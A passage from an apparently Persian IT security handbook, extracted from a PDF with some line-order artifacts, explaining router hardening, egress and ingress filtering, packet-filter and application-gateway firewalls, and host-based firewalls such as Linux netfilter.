‫ﻓﻴﺰﻳﻜﻲ )ﻭ ﻣﺜ ﹰﻼ ﺑﺎ ﭘﺎﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻳﻚ ﻛﺎﺑﻞ ﺳﺮﻳﺎﻝ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺏ ﻣﺘﺼﻞ ﺍﺳﺖ( ﻗﺎﺑﻞ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻫﺴﺘﻨﺪ ﻭ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ‬

‫‪251 High-End Routers‬‬


‫‪252 Network Address Translation‬‬
‫‪253 Network Layout Information‬‬
‫‪٣٨٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﺗﻐﻴﻴﺮ ﺩﺍﺩ‪ .‬ﮔﺰﻳﻨﻪﻫﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺑﺎﻳﺪ ﻫﻤﻮﺍﺭﻩ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺍﺯ ﻃﺮﻳﻖ‬
‫‪ SNMP‬ﻣﺪﻳﺮﻳﺖ ﺷﻮﻧﺪ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺭﻭﻱ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺩﺳﺘﺮﺳﻲ ﻧﻮﺷﺘﻦ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﺪ‪.‬‬
‫‪٢٥٤‬‬
‫ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺷﺒﻜﻪ ﻧﻔﺮﺳﺘﻨﺪ‪ ،‬ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺁﺩﺭﺱ ‪IP‬‬ ‫ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﻣﺮﺯﻱ ﺑﺎﻳﺪ ﻣﺠﻬﺰ ﺑﻪ ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ‬
‫‪٢٥٥‬‬
‫ﻣﺒﺪﺃ ﺑﺴﺘﻪ‪ ،‬ﻣﻌﺘﺒﺮ ﻭ ﻳﻚ ﺁﺩﺭﺱ ﻣﺘﻌﻠﻖ ﺑﻪ ﺁﻥ ﺷﺒﻜﻪ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﻣﺠﻬﺰ ﺑﻪ ﺻﺎﻓﻴﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺑﺎﺷﻨﺪ ﺗﺎ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺟﻌﻠﻲ ﻛﻪ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺍﺯ ﺩﺍﺧﻞ ﺷﺒﻜﻪ ﺁﻣﺪﻩﺍﻧﺪ‪ ،‬ﺭﻭﻱ ﻭﺍﺳﻂ ﺧﺎﺭﺟﻲ ﻣﺴﻴﺮﻳﺎﺏ ﭘﺬﻳﺮﻓﺘﻪ ﻧﺸﺪﻩ ﻭ ﺑﻪ ﺩﺍﺧﻞ ﻓﺮﺳﺘﺎﺩﻩ ﻧﺸﻮﻧﺪ‪.‬‬

‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺧﺎﺭﺟﻲ‬


‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻭﺳﻴﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺟﺮﻳﺎﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﻪ ﻃﺮﺍﺣﻲ ﺷﺪﻩ‪ ،‬ﻭ ﺗﻨﻬﺎ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ‬
‫ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺯ ﻭﺭﻭﺩﻳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﻋﺒﻮﺭ ﻛﻨﻨﺪ ﺭﺍ ﻋﺒﻮﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﻮﻋﹰﺎ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ‪ :‬ﺻﺎﻓﻴﻬﺎﻱ ﺑﺴﺘﻪ‪ ،٢٥٦‬ﻭ ﺩﺭﻭﺍﺯﻩﻫﺎﻱ ﺑﺮﻧﺎﻣﻪ‪ .٢٥٧‬ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻏﺮﺑﺎﻝﺳﺎﺯ ﺑﺴﺘﻪﻫﺎ‪،‬‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﻭ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺁﻳﺎ ﻣﺠﺎﺯ ﺑﻪ ﻋﺒﻮﺭ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻫﺴﺘﻨﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻗﺪﻳﻤﻲ ﻏﺮﺑﺎﻝﺳﺎﺯ ﺑﺴﺘﻪﻫﺎ ﺳﺎﺧﺘﺎﺭ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺍﻱ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺗﻲ ﭼﻮﻥ ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ‬
‫ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺑﺴﺘﻪﻫﺎ ﻣﺎﻧﻨﺪ ‪ SYN‬ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﺳﺮﺁﻳﻨﺪ‪ ٢٥٨‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﻪ ﺑﺴﺘﻪﻫﺎ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻨﺪ ﻳﺎ ﺟﻠﻮﻱ ﻋﺒﻮﺭ ﺁﻧﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫ﺻﺎﻓﻲﻫﺎﻱ ﺑﺴﺘﻪﺍﻱ ﻛﻪ ﻭﺍﺭﺳﻲ ‪ stateful‬ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭﺿﻌﻴﺖ ﻫﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻛﻪ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﮔﺬﺭﺩ ﺭﺍ ﺑﻪ ﺧﺎﻃﺮ ﻣﻲﺳﭙﺎﺭﻧﺪ‪ ،‬ﻭ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻳﻚ ﺑﺴﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺍﺗﺼﺎﻝ ﺧﺎﺹ ﻫﺴﺖ ﻳﺎ ﻧﻪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪ ﺭﺍ ﻧﻴﺰ‬
‫ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ‪ stateful‬ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﺓ ‪ FTP‬ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺗﺸﺨﻴﺺ‬
‫ﺩﻫﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺍﺗﺼﺎﻝ ‪ FTP‬ﻣﻮﺟﻮﺩ ﻭ ﻣﺠﺎﺯ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻥ ﺍﺟﺎﺯﺓ ﺍﻧﺘﻘﺎﻝ ﺩﻫﺪ‪ ،‬ﻭ ﺩﺭ ﻫﻤﺎﻥ ﺣﺎﻝ ﺟﻠﻮﻱ ﻳﻚ ﺍﺗﺼﺎﻝ ﺟﺪﻳﺪ‬
‫ﻭﺭﻭﺩﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﭘﻮﺭﺕ ﺭﺍ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻱ ﺷﺒﻜﻪ ﺑﺠﺎﻱ ﺳﻄﺢ ﺑﺴﺘﻪ‪ ٢٥٩‬ﺩﺭ ﺳﻄﺢ ﺑﺮﻧﺎﻣﻪ‪ ٢٦٠‬ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﻭ ﻧﻮﻋﹰﺎ ﺍﺯ ﭼﻨﺪ ‪ proxy‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﻳﻚ ﺩﺭﻭﺍﺯﺓ ﺑﺮﻧﺎﻣﻪﺍ ﹺ‬
‫ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻓﺮﺍﺩ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﺠﺎﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺑﻪ ‪ proxy‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﻳﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﻛﻪ ﺭﻭﻱ ﭘﻮﺭﺕ ‪ ٨٠‬ﺍﺳﺖ ﻣﺘﺼﻞ ﺷﻮﻧﺪ‪ .‬ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ proxy‬ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺗﺼﺎﻝ ﺍﺯ ﺻﺤﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩﺍﻱ ﺁﻧﺮﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺍﻗﻌﻲ ﻭﺏ ﺩﺍﺧﻠﻲ ﻣﻨﺘﻘﻞ ﻧﻤﺎﻳﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ‪ proxy‬ﻣﺴﺌﻮﻟﻴﺖ‬
‫ﺍﺭﺳﺎﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺩﺍﺧﻠﻲ ﺑﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺧﺎﺭﺟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺟﻠﻮﻱ ﺗﻤﺎﻡ ﺟﺮﻳﺎﻥ ﺩﺍﺩﺓ ﻭﺭﻭﺩﻱ ﺑﺠﺰ ﭼﻨﺪ ﺍﺳﺘﺜﻨﺎ ‪ -‬ﻣﺜﻞ ﺍﺟﺎﺯﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ ‪ HTTP‬ﺑﻪ ﭘﻮﺭﺕ ‪ ٨٠‬ﺑﺮﺍﻱ ﻫﻤﻪ‪ ،‬ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ‬ ‫•‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ ‪ SSH‬ﺑﻪ ﭘﻮﺭﺕ ‪ - ٢٢‬ﺭﺍ ﺑﮕﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻫﺮﺁﻧﭽﻪ‬
‫ﻻ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺗﻮﺻﻴﻪ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﻛﻪ ﻣﺠﺎﺯ ﻧﻴﺴﺖ" ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﻳﻚ ﺍﻟﮕﻮﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺝﺷﻮﻧﺪﺓ ‪ HTTP‬ﺑﻪ ﻣﻘﺼﺪ ﻫﺮﻛﺠﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺟﺎﺯﺓ ﺧﺮﻭﺝ ﺩﻫﺪ‪ ،‬ﺍﻣﺎ ﺍﺗﺼﺎﻻﺕ ﺑﻪ ﺳﻤﺖ ﺩﺭﻭﻥ ﺭﺍ ﺗﻨﻬﺎ ﺍﺯ ﺑﺮﺧﻲ‬ ‫•‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺧﺎﺹ ﻣﺠﺎﺯ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻞ ﺩﺭ ﺁﻳﻨﺪﻩ ﺛﺒﺖ ﻛﻨﺪ‪.‬‬ ‫•‬

‫‪254‬‬ ‫‪Egress Filters‬‬


‫‪255‬‬ ‫‪Ingress Filters‬‬
‫‪256‬‬ ‫‪Packet Filters‬‬
‫‪257‬‬ ‫‪Application Gateways‬‬
‫‪258‬‬ ‫‪Header‬‬
‫‪259‬‬ ‫‪Packet Level‬‬
‫‪260‬‬ ‫‪Application Level‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٩٠‬‬

‫ﻼ ﺍﻳﻨﻜﻪ ﭼﻨﺪﻳﻦ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺭﺍ‬


‫ﻛﺘﺎﺑﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺧﻮﺏ ﺯﻳﺎﺩﻱ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺁﺗﺶ ﻣﻨﺘﺸﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻃﺮﺍﺣﻲ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ‪ -‬ﻣﺜ ﹰ‬
‫ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﺗﺎ ﺷﺒﻜﻪ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﻪ ﻳﻚ ﺯﻳﺮﺷﺒﻜﻪ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‬
‫)ﻣﻌﺮﻭﻑ ﺑﻪ ﻧﺎﺣﻴﻪ ﻏﻴﺮﻧﻈﺎﻣﻲﺷﺪﻩ‪ (٢٦١‬ﻭ ﻳﻚ ﺯﻳﺮﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺩﺭ ﺍﻣﺎﻥ ﺑﺎﺷﺪ ﺍﻓﺰﺍﺭ ﻛﻨﻨﺪ ‪ -‬ﺭﺍ ﺑﻄﻮﺭ ﻋﻤﻴﻖ ﺷﺮﺡ‬
‫‪٢٦٢‬‬
‫ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬

‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ‬


‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺟﻤﻠﻪ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺧﻴﺮ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ،‬ﺧﻮﺩ ﺩﺍﺭﺍﻱ ﻳﻚ ﺻﺎﻓﻲ ﺑﺴﺘﺔ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﻭ‬
‫ﺑﺮﺧﻲ ﻣﺜﻞ ﺑﺮﻧﺎﻣﺔ ‪ netfilter‬ﺩﺭ ‪ ،Linux 2.4‬ﺍﻣﻜﺎﻥ ﻭﺍﺭﺳﻲ ‪ stateful‬ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻧﻴﺰ ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩﺍﻧﺪ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﺎ ﺿﻮﺍﺑﻄﻲ ﻛﻨﺘﺮﻝ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﺟﺮﺍ ﺩﺭ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ )‪ (kernel‬ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺮ ﺍﺳﺎﺱ ﻧﻮﻉ ﺑﺴﺘﻪﻫﺎ‪ ،‬ﻣﻴﺰﺑﺎﻥ‪ ،‬ﭘﺮﻭﺗﻜﻞ‪ ،‬ﻭ ﻳﺎ‬
‫ﺣﺘﻲ ﻧﺸﺎﻧﻬﺎﻱ ﺑﺴﺘﻪﻫﺎ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺑﺴﺘﻪﻫﺎ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺑﺪﻫﻨﺪ ﻳﺎ ﻧﺪﻫﻨﺪ‪ .‬ﺧﻂﻣﺸﻲﻫﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺎﻓﻴﻬﺎﻱ ﺑﺴﺘﺔ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ‬
‫ﺑﺴﻴﺎﺭ ﻣﺸﺎﺑﻪ ﺧﻂﻣﺸﻲﻫﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺧﺎﺭﺟﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺷﻤﺎ ﺑﻪ ﻳﻚ ‪ kernel‬ﺩﺍﺭﺍﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪ ﻣﻲﺍﻓﺰﺍﻳﻴﺪ‪ ،‬ﺑﻪ ﺿﻮﺍﺑﻂ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻛﻪ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻜﻪ‬
‫ﺑﺎ ﺳﻴﺴﺘﻢ ‪) tcpwrapper‬ﻛﻪ ﺫﻳ ﹰﻼ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ( ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﻳﺎ ﻫﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﺎﺭﺟﻲ ﻛﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺭﺑﺮﮔﻴﺮﻧﺪﻩ ﻣﻴﺰﺑﺎﻥ‬
‫ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺳﻄﺢ ‪ kernel‬ﻳﻚ ﻻﻳﺔ ﺣﻔﺎﻇﺘﻲ ﺑﻴﺸﺘﺮ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﻗﺴﻤﺖ ﻣﻬﻤﻲ ﺍﺯ ﻳﻚ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺩﻓﺎﻉ ﭼﻨﺪﻻﻳﻪ ﻣﺤﺴﻮﺏ ﺷﻮﺩ‪.‬‬
‫ﺍﺷﻜﺎﻝ ﺍﺻﻠﻲ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﺼﺮﻑ ﺗﻮﺍﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺯﻳﺮ ﺑﺎﺭ‬
‫ﺳﻨﮕﻴﻦ ﻭ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺠﻤﻮﻋﺔ ﺿﻮﺍﺑﻂ ﻃﻮﻻﻧﻲ ﺑﺎﺷﻨﺪ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻃﺎﻗﺖ ﺗﺤﻤﻞ ﺁﻧﺮﺍ‬
‫ﺶ ﺩﺭ ﺳﻄﺢ ﺑﺴﺘﻪ ﻓﺸﺎﺭ ﭼﻨﺪﺍﻥ ﺯﻳﺎﺩﻱ ﺑﺮ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﻧﻤﻲﺁﻭﺭﻧﺪ‪.‬‬ ‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﮏ ﺳﻴﺴﺘﻢ ‪ Intel 486‬ﺑﺎ ﺗﻮﺍﻥ ‪ 33 MHz‬ﻣﺠﻬﺰ ﺑﻪ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Unix‬ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺍﻓﻴﻚ ﻳﻚ ﺧﻂ‬
‫ﻼ ﺑﺎﺭﺷﺪﺓ ‪ T1‬ﻳﺎ ‪ DSL‬ﺭﺍ ﭘﺮﺩﺍﺯﺵ ﻛﻨﺪ‪.‬‬ ‫ﻛﺎﻣ ﹰ‬
‫ﻏﺎﻟﺒﹰﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺿﻮﺍﺑﻄﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻪ ﻣﻘﺼﺪ ﻣﻴﺰﺑﺎﻥ‪،‬‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺧﺎﺭﺝﺷﻮﻧﺪﻩ ﺍﺯ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﻭ ﻧﻴﺰ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻥ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﻴﺰﺑﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺩﺭﻭﺍﺯﺓ ﺁﻧﻬﺎ ﻋﻤﻞ ﻣﻲﻛﻨﺪ ﺍﻋﻤﺎﻝ‬
‫ﺷﻮﻧﺪ‪ .‬ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺭﻭﺵ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺴﺘﻪﻫﺎﻱ‬
